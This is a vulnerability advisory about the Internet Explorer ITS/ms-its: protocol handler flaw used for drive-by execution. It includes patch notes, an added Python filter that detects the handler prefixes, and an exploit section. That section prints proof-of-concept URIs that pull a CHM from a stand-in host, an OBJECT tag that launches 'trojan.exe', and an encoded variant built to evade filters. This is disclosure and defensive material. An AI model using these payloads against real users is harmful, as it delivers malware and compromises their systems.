The issue may be exploited via the ITS (InfoTech Storage) Protocol URI handler. It is possible to use this protocol to force a browser into the Local Zone by redirecting into a non-existent MHTML file (using other known vulnerabilities). In this manner, it may be possible to reference hostile content to be executed in the Local Zone, such as a malicious CHM file. The issue, in combination with other vulnerabilities, is exploitable to provide for automatic delivery and execution of an arbitrary executable. This would occur when malicious web content is rendered in Internet Explorer.

Outlook products and other components that use Internet Explorer to render HTML content also present possible attack vectors for this issue.

It should be noted that there are multiple ways to invoke the protocol handler, such as through its:, ms-its:, ms-itss: and mk:@MSITStore: URIs. It has also been reported that web browsers other than Internet Explorer may invoke the operating system URI handlers for the ITS protocol.

It has been reported that this vulnerability is actively being exploited as an infection vector for malicious code that has been dubbed Trojan.Ibiza.

**NOTE: Microsoft has released a cumulative update for Outlook Express (MS04-013) to address the MHTML-related vulnerabilities that are commonly exploited in tandem with this issue. While MS04-013 lists the same CVE candidate name as this BID, it is not currently known if this update also addresses the distinct ITS Protocol vulnerability. However, users are advised to apply the available updates, as they will reduce exposure to existing exploits that rely on the MHTML issues to exploit this or other vulnerabilities. It should be noted that if this individual vulnerability has not been addressed by the update, there may still potentially be other attack vectors which do not rely on the MHTML issues.

**Update: Symantec has observed targeted attacks "in the wild" with confirmation that systems were compromised as a result. Users are advised to ensure that the patch has been installed and take appropriate measures to avoid future attacks using potentially unpublished and unpatched vulnerabilities. This includes disabling scripting and active content by default wherever possible (use the MSIE Zone functionality to permit scripting for content from trusted domains). Avoid visiting suspicious links, such as those included in e-mail/instant messages or other untrustworthy communications. Disable HTML e-mail, if possible.

- Exploit

**UPDATE: Symantec has determined that this vulnerability is being exploited "in the wild", in what appear to be targeted attacks.

The following proof-of-concept has been supplied:

ms-its:mhtml:file://C:\ss.MHT!http://www.example.com//chm.chm::/files/launch.htm

The following example demonstrates the exploitation of this issue:

The attacker would create a script (i.e., launch.html) containing a CLASSID exploit as a CHM such as:
<OBJECT NAME='X' CLASSID='CLSID:11111111-1111-1111-1111-111111111123' CODEBASE='trojan.exe'>

The attacker would then utilize another script tag to execute the launch.html such as:
<IMG SRC='ms-its:mhtml:file://C:\ss.MHT!http://www.example.com//chm.chm::/files/launch.htm'>
<IMG SRC='ms-its:mhtml:file://C:\ss.MHT!http://www.example.com//chm.chm::/files/launch.htm'>
<IMG SRC='ms-its:mhtml:file://C:\ss.MHT!http://www.example.com//chm.chm::/files/launch.htm'>
<IFRAME SRC='redirgen.php?url=URL:ms-its:mhtml:file://C:\ss.MHT!http://www.example.com//chm.chm::/files/launch.htm'>

Additional proof-of-concepts have been published by http-equiv and Jelmer that demonstrate different payloads:
http://www.malware.com/junk-de-lux.html
http://ip3e83566f.speed.planet.nl/security/newone/exploit.htm

Additional proof-of-concepts were provided in the "IE ms-its: and mk:@MSITStore: vulnerability" BugTraq post by Roozbeh Afrasiabi.

Jelmer also released the following proof-of-concept example which may potentially bypass some filters due to using encoded characters in the exploit string:

&#109;s-its:mhtml:file://C:\foo.mht!${PATH}/EXPLOIT.CHM::/exploit.htm

This issue is known to be exploited in the wild.
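
For content filters, the two points above (the handler answers to several prefixes, and an entity-encoded prefix can slip past a literal string match) mean the check has to decode before it compares. The following is an added example, not code from the original advisory: a Python scanner that flags URL-bearing attributes referencing any of the four ITS prefixes after peeling HTML-entity and percent encoding. The attribute list, function names and sample markup are assumptions made for illustration.

```python
import html
import re
from html.parser import HTMLParser
from urllib.parse import unquote

# Attributes that carry a URL the renderer may hand to a protocol handler
# (assumed list for this example).
URL_ATTRS = {"src", "href", "data", "codebase", "action", "background"}

# The four handler prefixes named on this page. The lookbehind keeps "its:"
# from matching inside ordinary words such as "units:".
ITS_RE = re.compile(r"(?<![a-z0-9+.\-])(ms-itss:|ms-its:|mk:@msitstore:|its:)")


def find_its_scheme(value, max_rounds=5):
    """Return the ITS handler prefix found in an attribute value, or None."""
    for _ in range(max_rounds):  # peel layered entity / percent encoding
        decoded = unquote(html.unescape(value))
        if decoded == value:
            break
        value = decoded
    # Drop whitespace and control characters, then compare case-insensitively.
    value = re.sub(r"[\x00-\x20]+", "", value).lower()
    match = ITS_RE.search(value)
    return match.group(1) if match else None


class ITSFinder(HTMLParser):
    """Collects (tag, attribute, prefix) for every flagged attribute."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        for name, value in attrs:
            if name in URL_ATTRS and value:
                scheme = find_its_scheme(value)
                if scheme:
                    self.findings.append((tag, name, scheme))


def scan(markup):
    finder = ITSFinder()
    finder.feed(markup)
    finder.close()
    return finder.findings


# Constructed sample markup; "placeholder-N" stands in for the rest of the URI.
SAMPLE = r'''
<img src="MS-ITS:placeholder-1">
<iframe src="redir.php?url=URL:ms-itss%3Aplaceholder-2"></iframe>
<img src="&amp;#109;s-its:placeholder-3">
<a href="mk:@MSITStore:placeholder-4">x</a>
<a href="https://www.example.com/units:list">benign</a>
'''

if __name__ == "__main__":
    for finding in scan(SAMPLE):
        print(finding)
```

The search runs over the whole decoded value rather than only its start, so a handler prefix passed through a redirector parameter is flagged as well.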

- Solution

This specific issue may be addressed by Microsoft Security Bulletin MS04-013, though this has not been confirmed. Users are still advised to install the applicable patches from MS04-013 as it will help to mitigate existing exploits for this issue which rely on the MHTML vulnerabilities (BIDs 9105 and 9107).

---
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com.
